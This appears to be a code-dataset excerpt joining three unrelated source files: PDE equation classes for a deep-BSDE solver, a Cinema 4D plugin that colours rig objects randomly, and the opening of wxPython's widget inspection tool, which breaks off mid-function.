dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = (1 + self.mu_bar * self.delta_t) * x_sample[:, :, i] + (
self.sigma * x_sample[:, :, i] * dw_sample[:, :, i])
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
piecewise_linear = tf.nn.relu(
tf.nn.relu(y - self.vh) * self.slope + self.gammah - self.gammal) + self.gammal
return (-(1 - self.delta) * piecewise_linear - self.rate) * y
def g_tf(self, t, x):
return tf.reduce_min(x, 1, keepdims=True)
class PricingDiffRate(Equation):
"""
Nonlinear Black-Scholes equation with different interest rates for borrowing and lending
in Section 4.4 of Comm. Math. Stat. paper doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(PricingDiffRate, self).__init__(eqn_config)
self.x_init = np.ones(self.dim) * 100
self.sigma = 0.2
self.mu_bar = 0.06
self.rl = 0.04
self.rb = 0.06
self.alpha = 1.0 / self.dim
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
factor = np.exp((self.mu_bar-(self.sigma**2)/2)*self.delta_t)
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = (factor * np.exp(self.sigma * dw_sample[:, :, i])) * x_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
temp = tf.reduce_sum(z, 1, keepdims=True) / self.sigma
return -self.rl * y - (self.mu_bar - self.rl) * temp + (
(self.rb - self.rl) * tf.maximum(temp - y, 0))
def g_tf(self, t, x):
temp = tf.reduce_max(x, 1, keepdims=True)
return tf.maximum(temp - 120, 0) - 2 * tf.maximum(temp - 150, 0)
class BurgersType(Equation):
"""
Multidimensional Burgers-type PDE in Section 4.5 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(BurgersType, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.y_init = 1 - 1.0 / (1 + np.exp(0 + np.sum(self.x_init) / self.dim))
self.sigma = self.dim + 0.0
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return (y - (2 + self.dim) / 2.0 / self.dim) * tf.reduce_sum(z, 1, keepdims=True)
def g_tf(self, t, x):
return 1 - 1.0 / (1 + tf.exp(t + tf.reduce_sum(x, 1, keepdims=True) / self.dim))
class QuadraticGradient(Equation):
"""
An example PDE with quadratically growing derivatives in Section 4.6 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(QuadraticGradient, self).__init__(eqn_config)
self.alpha = 0.4
self.x_init = np.zeros(self.dim)
base = self.total_time + np.sum(np.square(self.x_init) / self.dim)
self.y_init = np.sin(np.power(base, self.alpha))
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
x_square = tf.reduce_sum(tf.square(x), 1, keepdims=True)
base = self.total_time - t + x_square / self.dim
base_alpha = tf.pow(base, self.alpha)
derivative = self.alpha * tf.pow(base, self.alpha - 1) * tf.cos(base_alpha)
term1 = tf.reduce_sum(tf.square(z), 1, keepdims=True)
term2 = -4.0 * (derivative ** 2) * x_square / (self.dim ** 2)
term3 = derivative
term4 = -0.5 * (
2.0 * derivative + 4.0 / (self.dim ** 2) * x_square * self.alpha * (
(self.alpha - 1) * tf.pow(base, self.alpha - 2) * tf.cos(base_alpha) - (
self.alpha * tf.pow(base, 2 * self.alpha - 2) * tf.sin(base_alpha)
)
)
)
return term1 + term2 + term3 + term4
def g_tf(self, t, x):
return tf.sin(
tf.pow(tf.reduce_sum(tf.square(x), 1, keepdims=True) / self.dim, self.alpha))
class ReactionDiffusion(Equation):
"""
Time-dependent reaction-diffusion-type example PDE in Section 4.7 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(ReactionDiffusion, self).__init__(eqn_config)
self._kappa = 0.6
self.lambd = 1 / np.sqrt(self.dim)
self.x_init = np.zeros(self.dim)
self.y_init = 1 + self._kappa + np.sin(self.lambd * np.sum(self.x_init)) * np.exp(
-self.lambd * self.lambd * self.dim * self.total_time / 2)
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
exp_term = tf.exp((self.lambd ** 2) * self.dim * (t - self.total_time) / 2)
sin_term = tf.sin(self.lambd * tf.reduce_sum(x, 1, keepdims=True))
temp = y - self._kappa - 1 - sin_term * exp_term
return tf.minimum(tf.constant(1.0, dtype=tf.float64), tf.square(temp))
def g_tf(self, t, x):
return 1 + self._kappa + tf.sin(self.lambd * tf.reduce_sum(x, 1, keepdims=True))
| 2.390625 | 2 |
Cinema 4D/appdir_common/plugins/DazToC4D/lib/CustomColors.py | daz3d/DazToC4D | 16 | 12761607 | <gh_stars>10-100
import c4d
from c4d import documents
from random import randint
class randomColors():
IKMobjList = []
def selchildren(self, obj, next): # Scan obj hierarchy and select children
while obj and obj != next:
# global IKMobjList
self.IKMobjList.append(obj)
self.selchildren(obj.GetDown(), next)
obj = obj.GetNext()
return self.IKMobjList
def get_random_color(self):
""" Return a random color as c4d.Vector """
def get_random_value():
""" Return a random value between 0.0 and 1.0 """
return randint(0, 255) / 256.0
return c4d.Vector(get_random_value(), get_random_value(), get_random_value())
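    # Hedged usage sketch: assign a random display color to an assumed
    # c4d.BaseObject named obj:
    #     obj[c4d.ID_BASEOBJECT_USECOLOR] = 2
    #     obj[c4d.ID_BASEOBJECT_COLOR] = randomColors().get_random_color()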
def randomNullsColor(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
self.IKMobjList = []
parentOb = parentName
for o in self.selchildren(parentOb, parentOb.GetNext()):
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1
if 'HAND' in o.GetName() or \
'Pelvis' in o.GetName() or \
'Platform' in o.GetName() or \
'Head' in o.GetName():
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
# o[c4d.ID_CA_JOINT_OBJECT_ICONCOL] = 1
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
except:
pass
c4d.EventAdd()
def randomPoleColors(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
parentOb = parentName
for o in self.selchildren(parentOb, parentOb.GetNext()):
try:
tag = o.GetFirstTag()
tag[c4d.ID_CA_IK_TAG_DRAW_POLE_COLOR] = rigColor2
except:
pass
c4d.EventAdd()
except:
pass
def randomRigColor(self, parentName, randomCol=1, rigColor1=0, rigColor2=0):
doc = documents.GetActiveDocument()
try:
if randomCol == 1:
rigColor1 = self.get_random_color() # c4d.Vector(0,2,0)
rigColor2 = self.get_random_color() # c4d.Vector(1,0,0)
parentOb = parentName
self.IKMobjList = []
for o in self.selchildren(parentOb, parentOb.GetNext()):
o[c4d.ID_BASEOBJECT_USECOLOR] = 2
if "Head" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Neck" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Chest" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.9) + (rigColor1 * 0.1)
if "Spine" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Abdomen" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Spine2" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.7) + (rigColor1 * 0.3)
if "Collar" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Arm" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "ForeArm" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Hand" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Index" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Middle" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Ring" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Pink" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Thumb" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Finger" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Thumb" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor2
if "Pelvis" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = (rigColor2 * 0.2) + (rigColor1 * 0.8)
if "LegUpper" in o.GetName() or "jUpLeg" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.7
if "LegLower" in o.GetName() or "jLeg" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.6
if "Foot" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.3
if "Toes" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.3
if "ToesEnd" in o.GetName():
o[c4d.ID_BASEOBJECT_COLOR] = rigColor1 * 0.2
c4d.EventAdd()
except Exception as e:
print(e)
# pass
| 2.375 | 2 |
Lib/site-packages/wx/lib/inspection.py | 15008477526/- | 1 | 12761608 | <reponame>15008477526/-
#----------------------------------------------------------------------------
# Name: wx.lib.inspection
# Purpose: A widget inspection tool that allows easy introspection of
# all the live widgets and sizers in an application.
#
# Author: <NAME>
#
# Created: 26-Jan-2007
# Copyright: (c) 2007-2018 by Total Control Software
# Licence: wxWindows license
#
# Tags: py3-port, phoenix-port, documented
#----------------------------------------------------------------------------
# NOTE: This class was originally based on ideas sent to the
# wxPython-users mail list by <NAME>. See also
# wx.lib.mixins.inspect for a class that can be mixed-in with wx.App
# to provide Hot-Key access to the inspection tool.
"""
This modules provides the :class:`~wx.lib.inspection.InspectionTool` and
everything else needed to provide the Widget Inspection Tool (WIT).
"""
import wx
import wx.py
import wx.stc
#import wx.aui as aui
import wx.lib.agw.aui as aui
import six
import wx.lib.utils as utils
import sys
import inspect
#----------------------------------------------------------------------------
class InspectionTool:
"""
The :class:`InspectionTool` is a singleton that manages creating and
showing an :class:`InspectionFrame`.
"""
# Note: This is the Borg design pattern which ensures that all
# instances of this class are actually using the same set of
# instance data. See
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66531
__shared_state = None
def __init__(self):
if not InspectionTool.__shared_state:
InspectionTool.__shared_state = self.__dict__
else:
self.__dict__ = InspectionTool.__shared_state
if not hasattr(self, 'initialized'):
self.initialized = False
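    # Borg behaviour sketch (illustrative): every instance shares one state
    # dict, so initializing one instance is visible through any other:
    #     a = InspectionTool(); a.Init()
    #     assert InspectionTool().initialized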
def Init(self, pos=wx.DefaultPosition, size=wx.Size(850,700),
config=None, locals=None, app=None):
"""
Init is used to set some parameters that will be used later
when the inspection tool is shown. Suitable defaults will be
used for all of these parameters if they are not provided.
:param `pos`: The default position to show the frame at
:param `size`: The default size of the frame
:param `config`: A :class:`Config` object to be used to store layout
and other info to when the inspection frame is closed.
This info will be restored the next time the inspection
frame is used.
:param `locals`: A dictionary of names to be added to the PyCrust
namespace.
:param `app`: A reference to the :class:`App` object.
"""
self._frame = None
self._pos = pos
self._size = size
self._config = config
self._locals = locals
self._app = app
if not self._app:
self._app = wx.GetApp()
self.initialized = True
def Show(self, selectObj=None, refreshTree=False):
"""
        Creates the inspection frame if it hasn't been created already, and
        raises it if necessary.
:param `selectObj`: Pass a widget or sizer to have that object be
preselected in widget tree.
:param boolean `refreshTree`: rebuild the widget tree, default False
"""
if not self.initialized:
self.Init()
parent = self._app.GetTopWindow()
if not selectObj:
selectObj = parent
if not self._frame:
self._frame = InspectionFrame( parent=parent,
pos=self._pos,
size=self._size,
config=self._config,
locals=self._locals,
app=self._app)
if selectObj:
self._frame.SetObj(selectObj)
if refreshTree:
self._frame.RefreshTree()
self._frame.Show()
if self._frame.IsIconized():
self._frame.Iconize(False)
self._frame.Raise()
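# Typical usage sketch, the standard wxPython idiom for launching the WIT
# from within a running application:
#     import wx.lib.inspection
#     wx.lib.inspection.InspectionTool().Show()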
#----------------------------------------------------------------------------
class InspectionFrame(wx.Frame):
"""
This class is the frame that holds the wxPython inspection tools.
The toolbar and AUI splitters/floating panes are also managed
here. The contents of the tool windows are handled by other
classes.
"""
def __init__(self, wnd=None, locals=None, config=None,
app=None, title="wxPython Widget Inspection Tool",
*args, **kw):
kw['title'] = title
wx.Frame.__init__(self, *args, **kw)
self.SetExtraStyle(wx.WS_EX_BLOCK_EVENTS)
self.includeSizers = False
self.started = False
self.SetIcon(Icon.GetIcon())
self.MakeToolBar()
panel = wx.Panel(self, size=self.GetClientSize())
# tell FrameManager to manage this frame
self.mgr = aui.AuiManager(panel,
aui.AUI_MGR_DEFAULT
| aui.AUI_MGR_TRANSPARENT_DRAG
| aui.AUI_MGR_ALLOW_ACTIVE_PANE)
# make the child tools
self.tree = InspectionTree(panel, size=(100,300))
self.info = InspectionInfoPanel(panel,
style=wx.NO_BORDER,
)
if not locals:
locals = {}
myIntroText = (
"Python %s on %s, wxPython %s\n"
"NOTE: The 'obj' variable refers to the object selected in the tree."
% (sys.version.split()[0], sys.platform, wx.version()))
self.crust = wx.py.crust.Crust(panel, locals=locals,
intro=myIntroText,
showInterpIntro=False,
style=wx.NO_BORDER,
)
self.locals = self.crust.shell.interp.locals
self.crust.shell.interp.introText = ''
self.locals['obj'] = self.obj = wnd
self.locals['app'] = app
self.locals['wx'] = wx
wx.CallAfter(self._postStartup)
        # put the child tools in AUI panes
self.mgr.AddPane(self.info,
aui.AuiPaneInfo().Name("info").Caption("Object Info").
CenterPane().CaptionVisible(True).
CloseButton(False).MaximizeButton(True)
)
self.mgr.AddPane(self.tree,
aui.AuiPaneInfo().Name("tree").Caption("Widget Tree").
CaptionVisible(True).Left().Dockable(True).Floatable(True).
BestSize((280,200)).CloseButton(False).MaximizeButton(True)
)
self.mgr.AddPane(self.crust,
aui.AuiPaneInfo().Name("crust").Caption("PyCrust").
CaptionVisible(True).Bottom().Dockable(True).Floatable(True).
BestSize((400,200)).CloseButton(False).MaximizeButton(True)
)
self.mgr.Update()
if config is None:
config = wx.Config('wxpyinspector')
self.config = config
self.Bind(wx.EVT_CLOSE, self.OnClose)
if self.Parent:
tlw = self.Parent.GetTopLevelParent()
tlw.Bind(wx.EVT_CLOSE, self.OnClose)
self.LoadSettings(self.config)
self.crust.shell.lineNumbers = False
self.crust.shell.setDisplayLineNumbers(False)
self.crust.shell.SetMarginWidth(1, 0)
def MakeToolBar(self):
tbar = self.CreateToolBar(wx.TB_HORIZONTAL | wx.TB_FLAT | wx.TB_TEXT | wx.NO_BORDER )
tbar.SetToolBitmapSize((24,24))
refreshBmp = Refresh.GetBitmap()
findWidgetBmp = Find.GetBitmap()
showSizersBmp = ShowSizers.GetBitmap()
expandTreeBmp = ExpandTree.GetBitmap()
collapseTreeBmp = CollapseTree.GetBitmap()
highlightItemBmp = HighlightItem.GetBitmap()
evtWatcherBmp = EvtWatcher.GetBitmap()
toggleFillingBmp = ShowFilling.GetBitmap()
refreshTool = tbar.AddTool(-1, 'Refresh', refreshBmp,
shortHelp = 'Refresh widget tree (F1)')
findWidgetTool = tbar.AddTool(-1, 'Find', findWidgetBmp,
shortHelp='Find new target widget. (F2) Click here and\nthen on another widget in the app.')
showSizersTool = tbar.AddTool(-1, 'Sizers', showSizersBmp,
shortHelp='Include sizers in widget tree (F3)',
kind=wx.ITEM_CHECK)
expandTreeTool = tbar.AddTool(-1, 'Expand', expandTreeBmp,
shortHelp='Expand all tree items (F4)')
collapseTreeTool = tbar.AddTool(-1, 'Collapse', collapseTreeBmp,
shortHelp='Collapse all tree items (F5)')
highlightItemTool = tbar.AddTool(-1, 'Highlight', highlightItemBmp,
shortHelp='Attempt to highlight live item (F6)')
evtWatcherTool = tbar.AddTool(-1, 'Events', evtWatcherBmp,
shortHelp='Watch the events of the selected item (F7)')
toggleFillingTool = tbar.AddTool(-1, 'Filling', toggleFillingBmp,
shortHelp='Show PyCrust \'filling\' (F8)',
kind=wx.ITEM_CHECK)
tbar.Realize()
self.Bind(wx.EVT_TOOL, self.OnRefreshTree, refreshTool)
self.Bind(wx.EVT_TOOL, self.OnFindWidget, findWidgetTool)
self.Bind(wx.EVT_TOOL, self.OnShowSizers, showSizersTool)
self.Bind(wx.EVT_TOOL, self.OnExpandTree, expandTreeTool)
self.Bind(wx.EVT_TOOL, self.OnCollapseTree, collapseTreeTool)
self.Bind(wx.EVT_TOOL, self.OnHighlightItem, highlightItemTool)
self.Bind(wx.EVT_TOOL, self.OnWatchEvents, evtWatcherTool)
self.Bind(wx.EVT_TOOL, self.OnToggleFilling, toggleFillingTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnShowSizersUI, showSizersTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnWatchEventsUI, evtWatcherTool)
self.Bind(wx.EVT_UPDATE_UI, self.OnToggleFillingUI, toggleFillingTool)
tbl = wx.AcceleratorTable(
[(wx.ACCEL_NORMAL, wx.WXK_F1, refreshTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F2, findWidgetTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F3, showSizersTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F4, expandTreeTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F5, collapseTreeTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F6, highlightItemTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F7, evtWatcherTool.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F8, toggleFillingTool.GetId()),
])
self.SetAcceleratorTable(tbl)
def _postStartup(self):
if self.crust.ToolsShown():
self.crust.ToggleTools()
self.UpdateInfo()
self.started = True
def OnClose(self, evt):
evt.Skip()
if not self:
return
self.SaveSettings(self.config)
if hasattr(self, 'mgr'):
self.mgr.UnInit()
del self.mgr
if self.Parent:
tlw = self.Parent.GetTopLevelParent()
tlw.Unbind(wx.EVT_CLOSE, handler=self.OnClose)
def UpdateInfo(self):
self.info.UpdateInfo(self.obj)
def SetObj(self, obj):
if self.obj is obj:
return
self.locals['obj'] = self.obj = obj
self.UpdateInfo()
if not self.tree.built:
self.tree.BuildTree(obj, includeSizers=self.includeSizers)
else:
self.tree.SelectObj(obj)
def HighlightCurrentItem(self):
"""
Draw a highlight rectangle around the item represented by the
current tree selection.
"""
if not hasattr(self, 'highlighter'):
self.highlighter = _InspectionHighlighter()
self.highlighter.HighlightCurrentItem(self.tree)
def RefreshTree(self):
self.tree.BuildTree(self.obj, includeSizers=self.includeSizers)
def OnRefreshTree(self, evt):
self.RefreshTree()
self.UpdateInfo()
def OnFindWidget(self, evt):
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
self.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.OnCaptureLost)
self.CaptureMouse()
self.finding = wx.BusyInfo("Click on any widget in the app...")
def OnCaptureLost(self, evt):
self.Unbind(wx.EVT_LEFT_DOWN)
self.Unbind(wx.EVT_MOUSE_CAPTURE_LOST)
del self.finding
def OnLeftDown(self, evt):
self.ReleaseMouse()
wnd, pt = wx.FindWindowAtPointer()
if wnd is not None:
self.SetObj(wnd)
else:
wx.Bell()
self.OnCaptureLost(evt)
def OnShowSizers(self, evt):
self.includeSizers = not self.includeSizers
self.RefreshTree()
def OnExpandTree(self, evt):
current = self.tree.GetSelection()
self.tree.ExpandAll()
self.tree.EnsureVisible(current)
def OnCollapseTree(self, evt):
current = self.tree.GetSelection()
self.tree.CollapseAll()
self.tree.EnsureVisible(current)
self.tree.SelectItem(current)
def OnHighlightItem(self, evt):
self.HighlightCurrentItem()
def OnWatchEvents(self, evt):
item = self.tree.GetSelection()
obj = self.tree.GetItemData(item)
if isinstance(obj, wx.Window):
import wx.lib.eventwatcher as ew
watcher = ew.EventWatcher(self)
watcher.watch(obj)
watcher.Show()
def OnWatchEventsUI(self, evt):
item = self.tree.GetSelection()
if item:
obj = self.tree.GetItemData(item)
evt.Enable(isinstance(obj, wx.Window))
def OnToggleFilling(self, evt):
self.crust.ToggleTools()
def OnShowSizersUI(self, evt):
evt.Check(self.includeSizers)
def OnToggleFillingUI(self, evt):
if self.started:
evt.Check(self.crust.ToolsShown())
def LoadSettings(self, config):
self.crust.LoadSettings(config)
self.info.LoadSettings(config)
pos = wx.Point(config.ReadInt('Window/PosX', -1),
config.ReadInt('Window/PosY', -1))
size = wx.Size(config.ReadInt('Window/Width', -1),
config.ReadInt('Window/Height', -1))
self.SetSize(size)
self.Move(pos)
rect = utils.AdjustRectToScreen(self.GetRect())
self.SetRect(rect)
perspective = config.Read('perspective', '')
if perspective:
try:
self.mgr.LoadPerspective(perspective)
except wx.PyAssertionError:
# ignore bad perspective string errors
pass
self.includeSizers = config.ReadBool('includeSizers', False)
def SaveSettings(self, config):
self.crust.SaveSettings(config)
self.info.SaveSettings(config)
if not self.IsIconized() and not self.IsMaximized():
w, h = self.GetSize()
config.WriteInt('Window/Width', w)
config.WriteInt('Window/Height', h)
px, py = self.GetPosition()
config.WriteInt('Window/PosX', px)
config.WriteInt('Window/PosY', py)
if hasattr(self, "mgr"):
perspective = self.mgr.SavePerspective()
config.Write('perspective', perspective)
config.WriteBool('includeSizers', self.includeSizers)
#---------------------------------------------------------------------------
# should the inspection frame (and children) be included in the tree?
INCLUDE_INSPECTOR = True
USE_CUSTOMTREECTRL = False
if USE_CUSTOMTREECTRL:
import wx.lib.agw.customtreectrl as CT
TreeBaseClass = CT.CustomTreeCtrl
else:
TreeBaseClass = wx.TreeCtrl
class InspectionTree(TreeBaseClass):
"""
All of the widgets in the app, and optionally their sizers, are
loaded into this tree.
"""
def __init__(self, *args, **kw):
#s = kw.get('style', 0)
#kw['style'] = s | wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT
TreeBaseClass.__init__(self, *args, **kw)
self.roots = []
self.built = False
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelectionChanged)
self.toolFrame = wx.GetTopLevelParent(self)
if 'wxMac' in wx.PlatformInfo:
self.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
def BuildTree(self, startWidget, includeSizers=False, expandFrame=False):
if self.GetCount():
self.DeleteAllItems()
self.roots = []
self.built = False
realRoot = self.AddRoot('Top-level Windows')
for w in wx.GetTopLevelWindows():
if w is wx.GetTopLevelParent(self) and not INCLUDE_INSPECTOR:
continue
root = self._AddWidget(realRoot, w, includeSizers)
self.roots.append(root)
# Expand the subtree containing the startWidget, and select it.
if not startWidget or not isinstance(startWidget, wx.Window):
startWidget = wx.GetApp().GetTopWindow()
if expandFrame:
top = wx.GetTopLevelParent(startWidget)
topItem = self.FindWidgetItem(top)
if topItem:
self.ExpandAllChildren(topItem)
self.built = True
self.SelectObj(startWidget)
def _AddWidget(self, parentItem, widget, includeSizers):
text = self.GetTextForWidget(widget)
item = self.AppendItem(parentItem, text)
self.SetItemData(item, widget)
# Add the sizer and widgets in the sizer, if we're showing them
widgetsInSizer = []
if includeSizers and widget.GetSizer() is not None:
widgetsInSizer = self._AddSizer(item, widget.GetSizer())
# Add any children not in the sizer, or all children if we're
# not showing the sizers
for child in widget.GetChildren():
if (not child in widgetsInSizer and
(not child.IsTopLevel() or
isinstance(child, wx.PopupWindow))):
self._AddWidget(item, child, includeSizers)
return item
def _AddSizer(self, parentItem, sizer):
widgets = []
text = self.GetTextForSizer(sizer)
item = self.AppendItem(parentItem, text)
self.SetItemData(item, sizer)
self.SetItemTextColour(item, "blue")
for si in sizer.GetChildren():
if si.IsWindow():
w = si.GetWindow()
self._AddWidget(item, w, True)
widgets.append(w)
elif si.IsSizer():
ss = si.GetSizer()
widgets += self._AddSizer(item, ss)
ss._parentSizer = sizer
else:
i = self.AppendItem(item, "Spacer")
self.SetItemData(i, si)
self.SetItemTextColour(i, "blue")
return widgets
def FindWidgetItem(self, widget):
"""
Find the tree item for a widget.
"""
for item in self.roots:
found = self._FindWidgetItem(widget, item)
if found:
return found
return None
def _FindWidgetItem(self, widget, item):
if self.GetItemData(item) is widget:
return item
child, cookie = self.GetFirstChild(item)
while child:
found = self._FindWidgetItem(widget, child)
if found:
return found
child, cookie = self.GetNextChild(item, cookie)
return None
def GetTextForWidget(self, widget):
"""
Returns the string to be used in the tree for a widget
"""
if hasattr(widget, 'GetName'):
return "%s (\"%s\")" % (widget.__class__.__name__, widget.GetName())
return widget.__class__.__name__
def GetTextForSizer(self, sizer):
"""
Returns the string to be used in the tree for a sizer
"""
return "%s" % sizer.__class__.__name__
def SelectObj(self, obj):
item = self.FindWidgetItem(obj)
if item:
self.EnsureVisible(item)
self.SelectItem(item)
def OnSelectionChanged(self, evt):
item = evt.GetItem()
if item:
obj = self.GetItemData(item)
self.toolFrame.SetObj(obj)
#---------------------------------------------------------------------------
class InspectionInfoPanel(wx.stc.StyledTextCtrl):
"""
Used to display information about the currently selected items.
Currently just a read-only :class:`stc.StyledTextCtrl` with some plain
text. Should probably add some styles to make things easier to
read.
"""
def __init__(self, *args, **kw):
wx.stc.StyledTextCtrl.__init__(self, *args, **kw)
from wx.py.editwindow import FACES
self.StyleSetSpec(wx.stc.STC_STYLE_DEFAULT,
"face:%(mono)s,size:%(size)d,back:%(backcol)s" % FACES)
self.StyleClearAll()
self.SetReadOnly(True)
self.SetMarginType(1, 0)
self.SetMarginWidth(1, 0)
self.SetSelForeground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT))
self.SetSelBackground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))
def LoadSettings(self, config):
zoom = config.ReadInt('View/Zoom/Info', 0)
self.SetZoom(zoom)
def SaveSettings(self, config):
config.WriteInt('View/Zoom/Info', self.GetZoom())
def UpdateInfo(self, obj):
st = []
if not obj:
st.append("Item is None or has been destroyed.")
elif isinstance(obj, wx.Window):
st += self.FmtWidget(obj)
elif isinstance(obj, wx.Sizer):
st += self.FmtSizer(obj)
elif isinstance(obj, wx.SizerItem):
st += self.FmtSizerItem(obj)
self.SetReadOnly(False)
self.SetText('\n'.join(st))
self.SetReadOnly(True)
def Fmt(self, name, value):
if isinstance(value, six.string_types):
return " %s = '%s'" % (name, value)
else:
return " %s = %s" % (name, value)
def FmtWidget(self, obj):
def _countChildren(children):
count = 0
for child in children:
if not child.IsTopLevel():
count += 1
count += _countChildren(child.GetChildren())
return count
def _countAllChildren(children):
count = 0
for child in children:
count += 1
count += _countAllChildren(child.GetChildren())
return count
count = len([c for c in obj.GetChildren() if not c.IsTopLevel()])
rcount = _countChildren(obj.GetChildren())
tlwcount = _countAllChildren(obj.GetChildren())
st = ["Widget:"]
if hasattr(obj, 'GetName'):
st.append(self.Fmt('name', obj.GetName()))
st.append(self.Fmt('class', obj.__class__))
st.append(self.Fmt('bases', obj.__class__.__bases__))
st.append(self.Fmt('module', inspect.getmodule(obj)))
if hasattr(obj, 'this'):
st.append(self.Fmt('this', repr(obj.this)))
st.append(self.Fmt('id', obj.GetId()))
st.append(self.Fmt('style', obj.GetWindowStyle()))
st.append(self.Fmt('pos', obj.GetPosition()))
st.append(self.Fmt('size', obj.GetSize()))
st.append(self.Fmt('minsize', obj.GetMinSize()))
st.append(self.Fmt('bestsize', obj.GetBestSize()))
st.append(self.Fmt('client size', obj.GetClientSize()))
st.append(self.Fmt('virtual size',obj.GetVirtualSize()))
st.append(self.Fmt('IsEnabled', obj.IsEnabled()))
st.append(self.Fmt('IsShown', obj.IsShown()))
st.append(self.Fmt('IsFrozen', obj.IsFrozen()))
st.append(self.Fmt('fg color', obj.GetForegroundColour()))
st.append(self.Fmt('bg color', obj.GetBackgroundColour()))
st.append(self.Fmt('label', obj.GetLabel()))
if hasattr(obj, 'GetTitle'):
